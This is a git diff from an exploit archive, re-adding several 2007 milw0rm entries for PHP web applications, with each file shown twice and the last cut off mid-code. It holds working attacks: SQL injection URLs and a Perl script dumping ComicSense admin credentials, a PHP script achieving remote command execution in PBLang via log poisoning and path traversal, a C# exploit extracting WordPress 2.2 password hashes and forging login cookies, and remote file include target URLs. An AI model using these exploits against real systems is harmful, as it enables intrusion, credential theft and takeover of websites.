-+   ERROR [1];  action.php?                                         +
-+              include ($scdir."admin/config.inc.php");             +
-+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
-+   BUG                                                             +
-+   www.target.com/path/acrion.php?scdir=[3vil script]              +
-+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
-+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
-+   ERROR [2];  subs.php?                                           +
-+              include $scdir."admin/config.inc.php";               +
-+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
-+   BUG                                                             +
-+   www.target.com/path/subs.php?scdir=[3vil script]                +
-+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
-+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
-+   ERROR [3];  unsubs.php?                                         +
-+              include $scdir."admin/config.inc.php";               +
-+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
-+   BUG                                                             +
-+   www.target.com/path/unsubs.php?scdir=[3vil script]              +
-+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
-+DORK:(                                                             +
-+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
-++++++++++CYBER-SECURITY+++++++++++++++++++++++++++++++++++++++++++++
-+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
-+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
-
-# milw0rm.com [2007-06-05]
+++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++++++
++   K-letter 1.0 << Remote File include                             +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++   DownloadScript: http://www.scripts.com.ua/download.php?ID=813   +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++   Cyber-warrior.org <<< sanal alemin DEV.                         +
++                                                                   +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++   ERROR [1];  action.php?                                         +
++              include ($scdir."admin/config.inc.php");             +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++   BUG                                                             +
++   www.target.com/path/acrion.php?scdir=[3vil script]              +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++   ERROR [2];  subs.php?                                           +
++              include $scdir."admin/config.inc.php";               +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++   BUG                                                             +
++   www.target.com/path/subs.php?scdir=[3vil script]                +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++   ERROR [3];  unsubs.php?                                         +
++              include $scdir."admin/config.inc.php";               +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++   BUG                                                             +
++   www.target.com/path/unsubs.php?scdir=[3vil script]              +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++DORK:(                                                             +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++CYBER-SECURITY+++++++++++++++++++++++++++++++++++++++++++++
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+
+# milw0rm.com [2007-06-05]
diff --git a/platforms/php/webapps/4035.txt b/platforms/php/webapps/4035.txt
index 624b39ac8..1c0b8faf9 100755
--- a/platforms/php/webapps/4035.txt
+++ b/platforms/php/webapps/4035.txt
@@ -1,33 +1,33 @@
-*********************************************
-  Comicsense SQL Injection Advisory/Exploit
-*********************************************
-
-by s0cratex
-s0cratex@hotmail.com
-http://plexinium.net
-
--
-ComicSense is a script using php / mySQL.
-It allows you to easily host an Online Comic
-or Image shack.
-You can download it from www.gayadesign.nl/comicsense/
--
-
-The bug is a common sql injection in "index.php"
-
-Line 32:
-$sqlQuery = "SELECT * FROM " . $prefix . "comic WHERE episodenr = $epi";
-And the variable $epi is not verified...
-
-Exploit:
---------
-Admin username
-http://site.com/comic_paht/index.php?epi=-1 UNION SELECT username,1,1 FROM users
-
-MD5 hash password:
-http://site.com/comic_paht/index.php?epi=-1 UNION SELECT password,1,1 FROM users
-
-e-Mail adress:
-http://site.com/comic_paht/index.php?epi=-1 UNION SELECT email,1,1 from users
-
-# milw0rm.com [2007-06-05]
+*********************************************
+  Comicsense SQL Injection Advisory/Exploit
+*********************************************
+
+by s0cratex
+s0cratex@hotmail.com
+http://plexinium.net
+
+-
+ComicSense is a script using php / mySQL.
+It allows you to easily host an Online Comic
+or Image shack.
+You can download it from www.gayadesign.nl/comicsense/
+-
+
+The bug is a common sql injection in "index.php"
+
+Line 32:
+$sqlQuery = "SELECT * FROM " . $prefix . "comic WHERE episodenr = $epi";
+And the variable $epi is not verified...
+
+Exploit:
+--------
+Admin username
+http://site.com/comic_paht/index.php?epi=-1 UNION SELECT username,1,1 FROM users
+
+MD5 hash password:
+http://site.com/comic_paht/index.php?epi=-1 UNION SELECT password,1,1 FROM users
+
+e-Mail adress:
+http://site.com/comic_paht/index.php?epi=-1 UNION SELECT email,1,1 from users
+
+# milw0rm.com [2007-06-05]
diff --git a/platforms/php/webapps/4036.php b/platforms/php/webapps/4036.php
index 95ae5aad5..5f84cf108 100755
--- a/platforms/php/webapps/4036.php
+++ b/platforms/php/webapps/4036.php
@@ -1,212 +1,212 @@
-#!/usr/bin/php -q -d short_open_tag=on
-"-p") and ($temp<>"-P"))
-{$cmd.=" ".$argv[$i];}
-if ($temp=="-p")
-{
-  $port=str_replace("-p","",$argv[$i]);
-}
-if ($temp=="-P")
-{
-  $proxy=str_replace("-P","",$argv[$i]);
-}
-}
-$cmd=urlencode($cmd);
-if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
-if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
-
-$code="";
-$packet="GET " . $p . $code . " HTTP/1.0\r\n";
-$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
-$packet.="Host: " . $host . "\r\n";
-$packet.="Connection: close\r\n\r\n";
-
-sendpacketii($packet);
-sleep(3);
-
-$paths= array (
-"/../../../../../var/log/httpd/access_log",
-"/../../../../../var/log/httpd/error_log",
-"/../../../../../../var/log/httpd/access_log",
-"/../../../../../../var/log/httpd/error_log",
-"/../../../../../../../var/log/httpd/access_log",
-"/../../../../../../../var/log/httpd/error_log",
-"/../../../../../apache/logs/error.log",
-"/../../../../../apache/logs/access.log",
-"/../../../../../../apache/logs/error.log",
-"/../../../../../../apache/logs/access.log",
-"/../../../../../../../apache/logs/error.log",
-"/../../../../../../../apache/logs/access.log",
-"/../../../../../logs/error.log",
-"/../../../../../logs/access.log",
-"/../../../../../../logs/error.log",
-"/../../../../../../logs/access.log",
-"/../../../../../../../logs/error.log",
-"/../../../../../../../logs/access.log",
-"/../../../../../etc/httpd/logs/access_log",
-"/../../../../../etc/httpd/logs/access.log",
-"/../../../../../etc/httpd/logs/error_log",
-"/../../../../../etc/httpd/logs/error.log",
-"/../../../../../../etc/httpd/logs/access_log",
-"/../../../../../../etc/httpd/logs/access.log",
-"/../../../../../../etc/httpd/logs/error_log",
-"/../../../../../../etc/httpd/logs/error.log",
-"/../../../../../../../etc/httpd/logs/access_log",
-"/../../../../../../../etc/httpd/logs/access.log",
-"/../../../../../../../etc/httpd/logs/error_log",
-"/../../../../../../../etc/httpd/logs/error.log",
-"/../../../../../usr/local/apache/logs/access_log",
-"/../../../../../usr/local/apache/logs/access.log",
-"/../../../../../../usr/local/apache/logs/access_log",
-"/../../../../../../usr/local/apache/logs/access.log",
-"/../../../../../../../usr/local/apache/logs/access_log",
-"/../../../../../../../usr/local/apache/logs/access.log",
-"/../../../../../usr/local/apache/logs/error_log",
-"/../../../../../usr/local/apache/logs/error.log",
-"/../../../../../../usr/local/apache/logs/error_log",
-"/../../../../../../usr/local/apache/logs/error.log",
-"/../../../../../../../usr/local/apache/logs/error_log",
-"/../../../../../../../usr/local/apache/logs/error.log",
-"/../../../../../var/log/apache/access_log",
-"/../../../../../var/log/apache/access.log",
-"/../../../../../../var/log/apache/access_log",
-"/../../../../../../var/log/apache/access.log",
-"/../../../../../../../var/log/apache/access_log",
-"/../../../../../../../var/log/apache/access.log",
-"/../../../../../../var/log/apache/error_log",
-"/../../../../../../var/log/apache/error.log",
-"/../../../../../../../var/log/apache/error_log",
-"/../../../../../../../var/log/apache/error.log",
-"/../../../../../../../../var/log/apache/error_log",
-"/../../../../../../../../var/log/apache/error.log",
-"/../../../../../var/log/access_log",
-"/../../../../../var/log/access.log",
-"/../../../../../../var/log/access_log",
-"/../../../../../../var/log/access.log",
-"/../../../../../../../var/log/access_log",
-"/../../../../../../../var/log/access.log",
-"/../../../../../var/log/error_log",
-"/../../../../../var/log/error.log",
-"/../../../../../../var/log/error_log",
-"/../../../../../../var/log/error.log",
-"/../../../../../../../var/log/error_log",
-"/../../../../../../../var/log/error.log",
-"/../../../../../var/www/logs/access_log",
-"/../../../../../var/www/logs/access.log",
-"/../../../../../../var/www/logs/access_log",
-"/../../../../../../var/www/logs/access.log",
-"/../../../../../../../var/www/logs/access_log",
-"/../../../../../../../var/www/logs/access.log",
-"/../../../../../var/www/logs/error_log",
-"/../../../../../var/www/logs/error.log",
-"/../../../../../../var/www/logs/error_log",
-"/../../../../../../var/www/logs/error.log",
-"/../../../../../../../var/www/logs/error_log",
-"/../../../../../../../var/www/logs/error.log",
-);
-
-for ($i=0; $i<=count($paths)-1; $i++)
-{
-$a=$i+2;
-
-$packet ="GET " . $p . "login.php?lang=" . $paths[$i] . "%00&cmd=" . $cmd . " HTTP/1.1\r\n";
-$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
-$packet.="Host: " . $host . "\r\n"; 
-$packet.="Connection: Close\r\n\r\n";
-
-sendpacketii($packet);
-
-if (strstr($html,"w4ckw4ck"))
-    {
-     $temp=explode("w4ckw4ck",$html);
-	print "-------------------------------------------------------------------------\r\n";
-	print "             PBLang <= 4.67.16.a Remote Code Execution Exploit\r\n";
-	print "-------------------------------------------------------------------------\r\n";
-        echo $temp[1];
-	print "-------------------------------------------------------------------------\r\n";
-	print "            		 http://www.w4ck1ng.com\r\n";
-	print "            		        ...Silentz\r\n";
-	print "-------------------------------------------------------------------------\r\n";
-	exit;
-    }
-}
-
-	print "-------------------------------------------------------------------------\r\n";
-	print "             PBLang <= 4.67.16.a Remote Code Execution Exploit\r\n";
-	print "-------------------------------------------------------------------------\r\n";
-        echo "[-] Exploit Failed...\r\n";
-	print "-------------------------------------------------------------------------\r\n";
-	print "            		 http://www.w4ck1ng.com\r\n";
-	print "            		        ...Silentz\r\n";
-	print "-------------------------------------------------------------------------\r\n";
-
-?>
-
-# milw0rm.com [2007-06-06]
+#!/usr/bin/php -q -d short_open_tag=on
+"-p") and ($temp<>"-P"))
+{$cmd.=" ".$argv[$i];}
+if ($temp=="-p")
+{
+  $port=str_replace("-p","",$argv[$i]);
+}
+if ($temp=="-P")
+{
+  $proxy=str_replace("-P","",$argv[$i]);
+}
+}
+$cmd=urlencode($cmd);
+if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
+if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
+
+$code="";
+$packet="GET " . $p . $code . " HTTP/1.0\r\n";
+$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
+$packet.="Host: " . $host . "\r\n";
+$packet.="Connection: close\r\n\r\n";
+
+sendpacketii($packet);
+sleep(3);
+
+$paths= array (
+"/../../../../../var/log/httpd/access_log",
+"/../../../../../var/log/httpd/error_log",
+"/../../../../../../var/log/httpd/access_log",
+"/../../../../../../var/log/httpd/error_log",
+"/../../../../../../../var/log/httpd/access_log",
+"/../../../../../../../var/log/httpd/error_log",
+"/../../../../../apache/logs/error.log",
+"/../../../../../apache/logs/access.log",
+"/../../../../../../apache/logs/error.log",
+"/../../../../../../apache/logs/access.log",
+"/../../../../../../../apache/logs/error.log",
+"/../../../../../../../apache/logs/access.log",
+"/../../../../../logs/error.log",
+"/../../../../../logs/access.log",
+"/../../../../../../logs/error.log",
+"/../../../../../../logs/access.log",
+"/../../../../../../../logs/error.log",
+"/../../../../../../../logs/access.log",
+"/../../../../../etc/httpd/logs/access_log",
+"/../../../../../etc/httpd/logs/access.log",
+"/../../../../../etc/httpd/logs/error_log",
+"/../../../../../etc/httpd/logs/error.log",
+"/../../../../../../etc/httpd/logs/access_log",
+"/../../../../../../etc/httpd/logs/access.log",
+"/../../../../../../etc/httpd/logs/error_log",
+"/../../../../../../etc/httpd/logs/error.log",
+"/../../../../../../../etc/httpd/logs/access_log",
+"/../../../../../../../etc/httpd/logs/access.log",
+"/../../../../../../../etc/httpd/logs/error_log",
+"/../../../../../../../etc/httpd/logs/error.log",
+"/../../../../../usr/local/apache/logs/access_log",
+"/../../../../../usr/local/apache/logs/access.log",
+"/../../../../../../usr/local/apache/logs/access_log",
+"/../../../../../../usr/local/apache/logs/access.log",
+"/../../../../../../../usr/local/apache/logs/access_log",
+"/../../../../../../../usr/local/apache/logs/access.log",
+"/../../../../../usr/local/apache/logs/error_log",
+"/../../../../../usr/local/apache/logs/error.log",
+"/../../../../../../usr/local/apache/logs/error_log",
+"/../../../../../../usr/local/apache/logs/error.log",
+"/../../../../../../../usr/local/apache/logs/error_log",
+"/../../../../../../../usr/local/apache/logs/error.log",
+"/../../../../../var/log/apache/access_log",
+"/../../../../../var/log/apache/access.log",
+"/../../../../../../var/log/apache/access_log",
+"/../../../../../../var/log/apache/access.log",
+"/../../../../../../../var/log/apache/access_log",
+"/../../../../../../../var/log/apache/access.log",
+"/../../../../../../var/log/apache/error_log",
+"/../../../../../../var/log/apache/error.log",
+"/../../../../../../../var/log/apache/error_log",
+"/../../../../../../../var/log/apache/error.log",
+"/../../../../../../../../var/log/apache/error_log",
+"/../../../../../../../../var/log/apache/error.log",
+"/../../../../../var/log/access_log",
+"/../../../../../var/log/access.log",
+"/../../../../../../var/log/access_log",
+"/../../../../../../var/log/access.log",
+"/../../../../../../../var/log/access_log",
+"/../../../../../../../var/log/access.log",
+"/../../../../../var/log/error_log",
+"/../../../../../var/log/error.log",
+"/../../../../../../var/log/error_log",
+"/../../../../../../var/log/error.log",
+"/../../../../../../../var/log/error_log",
+"/../../../../../../../var/log/error.log",
+"/../../../../../var/www/logs/access_log",
+"/../../../../../var/www/logs/access.log",
+"/../../../../../../var/www/logs/access_log",
+"/../../../../../../var/www/logs/access.log",
+"/../../../../../../../var/www/logs/access_log",
+"/../../../../../../../var/www/logs/access.log",
+"/../../../../../var/www/logs/error_log",
+"/../../../../../var/www/logs/error.log",
+"/../../../../../../var/www/logs/error_log",
+"/../../../../../../var/www/logs/error.log",
+"/../../../../../../../var/www/logs/error_log",
+"/../../../../../../../var/www/logs/error.log",
+);
+
+for ($i=0; $i<=count($paths)-1; $i++)
+{
+$a=$i+2;
+
+$packet ="GET " . $p . "login.php?lang=" . $paths[$i] . "%00&cmd=" . $cmd . " HTTP/1.1\r\n";
+$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
+$packet.="Host: " . $host . "\r\n"; 
+$packet.="Connection: Close\r\n\r\n";
+
+sendpacketii($packet);
+
+if (strstr($html,"w4ckw4ck"))
+    {
+     $temp=explode("w4ckw4ck",$html);
+	print "-------------------------------------------------------------------------\r\n";
+	print "             PBLang <= 4.67.16.a Remote Code Execution Exploit\r\n";
+	print "-------------------------------------------------------------------------\r\n";
+        echo $temp[1];
+	print "-------------------------------------------------------------------------\r\n";
+	print "            		 http://www.w4ck1ng.com\r\n";
+	print "            		        ...Silentz\r\n";
+	print "-------------------------------------------------------------------------\r\n";
+	exit;
+    }
+}
+
+	print "-------------------------------------------------------------------------\r\n";
+	print "             PBLang <= 4.67.16.a Remote Code Execution Exploit\r\n";
+	print "-------------------------------------------------------------------------\r\n";
+        echo "[-] Exploit Failed...\r\n";
+	print "-------------------------------------------------------------------------\r\n";
+	print "            		 http://www.w4ck1ng.com\r\n";
+	print "            		        ...Silentz\r\n";
+	print "-------------------------------------------------------------------------\r\n";
+
+?>
+
+# milw0rm.com [2007-06-06]
diff --git a/platforms/php/webapps/4037.pl b/platforms/php/webapps/4037.pl
index 5653c09c2..c9bd1bb9c 100755
--- a/platforms/php/webapps/4037.pl
+++ b/platforms/php/webapps/4037.pl
@@ -1,69 +1,69 @@
-#!/usr/bin/perl -w
-
-#################################################################################
-#										#
-#		  	ComicSense 0.2 SQL Injection Exploit   			#
-#										#
-# Discovered by: s0cratex							#
-# Payload: Admin Username & Hash Retrieval					#
-# Website: http://www.w4ck1ng.com						#
-#										#
-# Original Advisory: http://seclists.org/bugtraq/2007/Jun/0063.html		#
-#		     http://milw0rm.com/exploits/4035				#
-# 										#
-# Vulnerable Code (index.php): 							#
-#										#
-#      $sqlQuery = "SELECT * FROM " . $prefix . "comic WHERE episodenr = $epi"; #
-#										#
-# PoC: http://victim.com/index.php?epi=-999 UNION SELECT username,0,password 	#
-#      FROM users LIMIT 1							#
-# 										#
-# Subject To: Nothing								#
-# GoogleDork: Get your own!							#
-#										#
-# Shoutz: The entire w4ck1ng community & s0cratex				#
-#										#
-#################################################################################
-
-use LWP::UserAgent;
-if (@ARGV < 1){
-print "-------------------------------------------------------------------------\r\n";
-print "               	 ComicSense 0.2 SQL Injection Exploit\r\n";
-print "-------------------------------------------------------------------------\r\n";
-print "Usage: w4ck1ng_comicsense.pl [PATH]\r\n\r\n";
-print "[PATH] = Path where ComicSense is located\r\n\r\n";
-print "e.g. w4ck1ng_comicsense.pl http://victim.com/comic/\r\n";
-print "-------------------------------------------------------------------------\r\n";
-print "            		 http://www.w4ck1ng.com\r\n";
-print "            		        ...Silentz\r\n";
-print "-------------------------------------------------------------------------\r\n";
-exit();
-}
-
-$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
-$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
-
-$host = $ARGV[0] . "index.php?epi=-999 UNION SELECT username,0,password FROM users LIMIT 1";
-
-$res = $b->request(HTTP::Request->new(GET=>$host));
-$res->content =~ /.jpg" alt="#(.*?):/;
-
-  ($user) = $res->content =~ /.jpg" alt="#(.*?):/;
-  ($hash) = $res->content =~ /: ([0-9a-fA-F]{32})" \/>/;
-
-if($user && $hash){
-
-print "-------------------------------------------------------------------------\r\n";
-print "               	 ComicSense 0.2 SQL Injection Exploit\r\n";
-print "-------------------------------------------------------------------------\r\n";
-print "[+] Admin User : $user\n";
-print "[+] Admin Hash : $hash\n";
-print "-------------------------------------------------------------------------\r\n";
-print "            		 http://www.w4ck1ng.com\r\n";
-print "            		        ...Silentz\r\n";
-print "-------------------------------------------------------------------------\r\n";
-} else {
-  print "\nExploit Failed...\n";
-}
-
-# milw0rm.com [2007-06-06]
+#!/usr/bin/perl -w
+
+#################################################################################
+#										#
+#		  	ComicSense 0.2 SQL Injection Exploit   			#
+#										#
+# Discovered by: s0cratex							#
+# Payload: Admin Username & Hash Retrieval					#
+# Website: http://www.w4ck1ng.com						#
+#										#
+# Original Advisory: http://seclists.org/bugtraq/2007/Jun/0063.html		#
+#		     http://milw0rm.com/exploits/4035				#
+# 										#
+# Vulnerable Code (index.php): 							#
+#										#
+#      $sqlQuery = "SELECT * FROM " . $prefix . "comic WHERE episodenr = $epi"; #
+#										#
+# PoC: http://victim.com/index.php?epi=-999 UNION SELECT username,0,password 	#
+#      FROM users LIMIT 1							#
+# 										#
+# Subject To: Nothing								#
+# GoogleDork: Get your own!							#
+#										#
+# Shoutz: The entire w4ck1ng community & s0cratex				#
+#										#
+#################################################################################
+
+use LWP::UserAgent;
+if (@ARGV < 1){
+print "-------------------------------------------------------------------------\r\n";
+print "               	 ComicSense 0.2 SQL Injection Exploit\r\n";
+print "-------------------------------------------------------------------------\r\n";
+print "Usage: w4ck1ng_comicsense.pl [PATH]\r\n\r\n";
+print "[PATH] = Path where ComicSense is located\r\n\r\n";
+print "e.g. w4ck1ng_comicsense.pl http://victim.com/comic/\r\n";
+print "-------------------------------------------------------------------------\r\n";
+print "            		 http://www.w4ck1ng.com\r\n";
+print "            		        ...Silentz\r\n";
+print "-------------------------------------------------------------------------\r\n";
+exit();
+}
+
+$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
+$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
+
+$host = $ARGV[0] . "index.php?epi=-999 UNION SELECT username,0,password FROM users LIMIT 1";
+
+$res = $b->request(HTTP::Request->new(GET=>$host));
+$res->content =~ /.jpg" alt="#(.*?):/;
+
+  ($user) = $res->content =~ /.jpg" alt="#(.*?):/;
+  ($hash) = $res->content =~ /: ([0-9a-fA-F]{32})" \/>/;
+
+if($user && $hash){
+
+print "-------------------------------------------------------------------------\r\n";
+print "               	 ComicSense 0.2 SQL Injection Exploit\r\n";
+print "-------------------------------------------------------------------------\r\n";
+print "[+] Admin User : $user\n";
+print "[+] Admin Hash : $hash\n";
+print "-------------------------------------------------------------------------\r\n";
+print "            		 http://www.w4ck1ng.com\r\n";
+print "            		        ...Silentz\r\n";
+print "-------------------------------------------------------------------------\r\n";
+} else {
+  print "\nExploit Failed...\n";
+}
+
+# milw0rm.com [2007-06-06]
diff --git a/platforms/php/webapps/4039.txt b/platforms/php/webapps/4039.txt
index 547fa1ded..6f79255b5 100755
--- a/platforms/php/webapps/4039.txt
+++ b/platforms/php/webapps/4039.txt
@@ -1,175 +1,175 @@
-/*
-El error, bastante tonto por cierto, se encuentra en la función wp_suggestCategories, en el archivo xmlrpc.php:
- 
-function wp_suggestCategories($args) {
-        global $wpdb;
-
-        $this->escape($args);
-
-        $blog_id                             = (int) $args[0];
-        $username                            = $args[1];
-        $password                            = $args[2];
-        $category                            = $args[3];
-        $max_results            	     = $args[4];
-
-        if(!$this->login_pass_ok($username, $password)) {
-                return($this->error);
-        }
-
-        // Only set a limit if one was provided.
-        $limit = "";
-        if(!empty($max_results)) {
-                $limit = "LIMIT {$max_results}";
-        }
-
-        $category_suggestions = $wpdb->get_results("
-                SELECT cat_ID category_id,
-                        cat_name category_name
-                FROM {$wpdb->categories}
-                WHERE cat_name LIKE '{$category}%'
-                {$limit}
-        ");
-
-        return($category_suggestions);
-}
-
-Como se puede observar en la porción de código, no se hace una conversión a entero del valor de $max_results, por lo que es posible enviar valores del tipo 0 UNION ALL SELECT user_login, user_pass FROM wp_users. Para que un atacante logre su objetivo, es necesario que éste tenga una cuenta de usuario válida (una cuenta de tipo suscriber basta y sobra) en el sitio víctima.
-
-Preparé un pequeño exploit (Creditos: Alex) que devuelve la lista de usuarios con sus respectivas contraseñas en MD5, además también incluye las cookies de autenticación para cada usuario.
-
-Credits: Alex de la Concha
-
-code c sharp:
-*/
- 
-using System;
-using System.Net;
-using System.Text;
-using System.Xml;
-using System.Text.RegularExpressions;
-using System.Security.Cryptography;
-
-class Program
-{
-    static void Main(string[] args)
-    {
-        string targetUrl = "http://localhost/wp/";
-        string login = "alex";
-        string password = "1234";
-
-        string data = @"
-  wp.suggestCategories
-  
-    1
-    {0}
-    {1}
-    1
-    0 UNION ALL SELECT user_login, user_pass FROM {2}users
-  
-";
-
-        string cookieHash = GetCookieHash(targetUrl);
-
-        using (WebClient request = new WebClient())
-        {
-            /* Probar con el prefijo por omisión */
-            string response = request.UploadString(targetUrl + "xmlrpc.php",
-                string.Format(data, login, password, "wp_svn_"));
-
-            /* Se hace una nueva petición si la consulta anterior falla */
-            Match match = Regex.Match(response, @"FROM\s+(.*?)categories\s+");
-            if (match.Success)
-            {
-                response = request.UploadString(targetUrl + "xmlrpc.php ",
-                    string.Format(data, login, password, match.Groups[1].Value));
-            }
-
-            try
-            {
-                XmlDocument doc = new XmlDocument();
-                doc.LoadXml(response);
-
-                XmlNodeList nodes = doc.SelectNodes("//struct/member/value");
-
-                if (nodes != null && doc.SelectSingleNode("/methodResponse/fault") == null)
-                {
-                    string user, pass;
-                    /* Mostrar lista de:
-                     * Usuario     md5(contraseña)
-                     * Cookie de Autenticación
-                     *
-                     */
-                    for (int i = 0; i < nodes.Count / 2 + 1; i += 2)
-                    {
-                        user = nodes.Item(i).InnerText;
-                        pass = nodes.Item(i + 1).InnerText;
-                        Console.WriteLine("Usuario: {0}\tMD5(Contraseña): {1}",
-                            user,
-                            pass);
-                        Console.WriteLine("Cookie: wordpressuser_{0}={1};wordpresspass_{0}={2}\n",
-                            cookieHash,
-                            user,
-                            MD5(pass));
-                    }
-                }
-                else
-                {
-                    Console.WriteLine("Error:\n{0}", response);
-                }
-            }
-            catch (Exception ex)
-            {
-                Console.WriteLine("Error:\n" + ex.ToString());
-            }
-        }
-    }
-
-    private static string GetCookieHash(string targetUrl)
-    {
-        WebRequest request = WebRequest.Create(targetUrl + "wp-login.php?action=logout");
-        request.Method = "HEAD";
-        (request as HttpWebRequest).AllowAutoRedirect = false;
-
-        WebResponse response = request.GetResponse();
-        if (response != null)
-        {
-            Match match = Regex.Match(response.Headers["Set-Cookie"],
-                    @"wordpress[a-z]+_([a-z\d]{32})",
-                    RegexOptions.IgnoreCase);
-
-            if (match.Success)
-                return match.Groups[1].Value;
-        }
-        return string.Empty;
-    }
-    public static string MD5(string password)
-    {
-        MD5CryptoServiceProvider x = new MD5CryptoServiceProvider();
-        byte[] bs = Encoding.UTF8.GetBytes(password);
-        bs = x.ComputeHash(bs);
-        StringBuilder s = new StringBuilder();
-        foreach (byte b in bs)
-        {
-            s.Append(b.ToString("x2").ToLower());
-        }
-        return s.ToString();
-    }
-}
-/*
-Para corregir este problema, mientras liberan actualizaciones para Wordpress 2.2, es editar el archivo xmlrpc.php y cambiar la línea $max_results = $args[4]; de la función wp_suggestCategories por $max_results = (int) $args[4]; o en su defecto bloquear el acceso a xmlrpc.php.
-
-o malo esque tienes que tener una cuenta aunque sea con los minimos permisos para obtener los demas nombres de users con sus respectivos MD5.
-
-    static void Main(string[] args)
-    {
-        string targetUrl = "http://localhost/wp/";
-        string login = "alex";
-        string password = "1234";
-
-hay seria la ruta donde esta colocado el wordpress 2.2, tu nombre de usuario y tu password.
-Ya se creo un zip con los archivos vulnerables ya reparados [ xmlrpc.php, wp-admin/post-new.php, wp-admin/page-new.php , wp-admin/users-edit.php. ]
-
-:: [Slappter] ::
-*/
-
-# milw0rm.com [2007-06-06]
+/*
+El error, bastante tonto por cierto, se encuentra en la función wp_suggestCategories, en el archivo xmlrpc.php:
+ 
+function wp_suggestCategories($args) {
+        global $wpdb;
+
+        $this->escape($args);
+
+        $blog_id                             = (int) $args[0];
+        $username                            = $args[1];
+        $password                            = $args[2];
+        $category                            = $args[3];
+        $max_results            	     = $args[4];
+
+        if(!$this->login_pass_ok($username, $password)) {
+                return($this->error);
+        }
+
+        // Only set a limit if one was provided.
+        $limit = "";
+        if(!empty($max_results)) {
+                $limit = "LIMIT {$max_results}";
+        }
+
+        $category_suggestions = $wpdb->get_results("
+                SELECT cat_ID category_id,
+                        cat_name category_name
+                FROM {$wpdb->categories}
+                WHERE cat_name LIKE '{$category}%'
+                {$limit}
+        ");
+
+        return($category_suggestions);
+}
+
+Como se puede observar en la porción de código, no se hace una conversión a entero del valor de $max_results, por lo que es posible enviar valores del tipo 0 UNION ALL SELECT user_login, user_pass FROM wp_users. Para que un atacante logre su objetivo, es necesario que éste tenga una cuenta de usuario válida (una cuenta de tipo suscriber basta y sobra) en el sitio víctima.
+
+Preparé un pequeño exploit (Creditos: Alex) que devuelve la lista de usuarios con sus respectivas contraseñas en MD5, además también incluye las cookies de autenticación para cada usuario.
+
+Credits: Alex de la Concha
+
+code c sharp:
+*/
+ 
+using System;
+using System.Net;
+using System.Text;
+using System.Xml;
+using System.Text.RegularExpressions;
+using System.Security.Cryptography;
+
+class Program
+{
+    static void Main(string[] args)
+    {
+        string targetUrl = "http://localhost/wp/";
+        string login = "alex";
+        string password = "1234";
+
+        string data = @"
+  wp.suggestCategories
+  
+    1
+    {0}
+    {1}
+    1
+    0 UNION ALL SELECT user_login, user_pass FROM {2}users
+  
+";
+
+        string cookieHash = GetCookieHash(targetUrl);
+
+        using (WebClient request = new WebClient())
+        {
+            /* Probar con el prefijo por omisión */
+            string response = request.UploadString(targetUrl + "xmlrpc.php",
+                string.Format(data, login, password, "wp_svn_"));
+
+            /* Se hace una nueva petición si la consulta anterior falla */
+            Match match = Regex.Match(response, @"FROM\s+(.*?)categories\s+");
+            if (match.Success)
+            {
+                response = request.UploadString(targetUrl + "xmlrpc.php ",
+                    string.Format(data, login, password, match.Groups[1].Value));
+            }
+
+            try
+            {
+                XmlDocument doc = new XmlDocument();
+                doc.LoadXml(response);
+
+                XmlNodeList nodes = doc.SelectNodes("//struct/member/value");
+
+                if (nodes != null && doc.SelectSingleNode("/methodResponse/fault") == null)
+                {
+                    string user, pass;
+                    /* Mostrar lista de:
+                     * Usuario     md5(contraseña)
+                     * Cookie de Autenticación
+                     *
+                     */
+                    for (int i = 0; i < nodes.Count / 2 + 1; i += 2)
+                    {
+                        user = nodes.Item(i).InnerText;
+                        pass = nodes.Item(i + 1).InnerText;
+                        Console.WriteLine("Usuario: {0}\tMD5(Contraseña): {1}",
+                            user,
+                            pass);
+                        Console.WriteLine("Cookie: wordpressuser_{0}={1};wordpresspass_{0}={2}\n",
+                            cookieHash,
+                            user,
+                            MD5(pass));
+                    }
+                }
+                else
+                {
